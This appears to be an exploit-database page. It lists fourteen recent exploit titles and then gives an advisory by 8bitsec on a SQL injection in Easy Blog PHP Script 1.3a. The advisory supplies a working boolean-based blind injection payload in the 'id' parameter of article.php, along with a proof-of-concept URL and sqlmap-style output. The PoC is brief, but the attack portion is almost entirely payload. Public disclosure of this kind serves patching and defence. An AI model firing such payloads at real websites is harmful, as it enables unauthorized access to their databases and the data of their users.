
14 new exploits DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC) Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass DiskBoss Enterprise 8.4.16 - 'Import Command' Buffer Overflow LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit) Oracle WebLogic Server 10.3.6.0 - Java Deserialization Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution Wordpress Plugin Ads Pro <= 3.4 - Cross-Site Scripting / SQL Injection Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure Trend Micro OfficeScan 11.0/XG (12.0) - Code Execution / Memory Corruption Trend Micro OfficeScan 11.0/XG (12.0) - Information Disclosure Trend Micro OfficeScan 11.0/XG (12.0) - Server Side Request Forgery Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection Roteador Wireless Intelbras WRN150 - Autentication Bypass Easy Blog PHP Script 1.3a - 'id' Parameter SQL Injection
37 lines
No EOL
1 KiB
Text
Executable file
37 lines
No EOL
1 KiB
Text
Executable file
# Exploit Title: Easy Blog PHP Script v1.3a - SQL Injection
|
|
# Date: 2017-09-27
|
|
# Exploit Author: 8bitsec
|
|
# Vendor Homepage: https://www.codester.com/
|
|
# Software Link: https://www.codester.com/items/4616/easy-blog-php-script
|
|
# Version: 1.3a
|
|
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
|
|
# Email: contact@8bitsec.io
|
|
# Contact: https://twitter.com/_8bitsec
|
|
|
|
Release Date:
|
|
=============
|
|
2017-09-27
|
|
|
|
Product & Service Introduction:
|
|
===============================
|
|
A simple and easy to setup script that allows you to have your own basic blog that comes packed with professional features.
|
|
|
|
Technical Details & Description:
|
|
================================
|
|
|
|
SQL injection on [id] parameter.
|
|
|
|
Proof of Concept (PoC):
|
|
=======================
|
|
|
|
SQLi:
|
|
|
|
http://localhost/[path]/article.php?id=8' AND 7160=7160 AND 'cbgz'='cbgz
|
|
|
|
Parameter: id (GET)
|
|
Type: boolean-based blind
|
|
Title: AND boolean-based blind - WHERE or HAVING clause
|
|
Payload: id=8' AND 7160=7160 AND 'cbgz'='cbgz
|
|
|
|
==================
|
|
8bitsec - [https://twitter.com/_8bitsec] |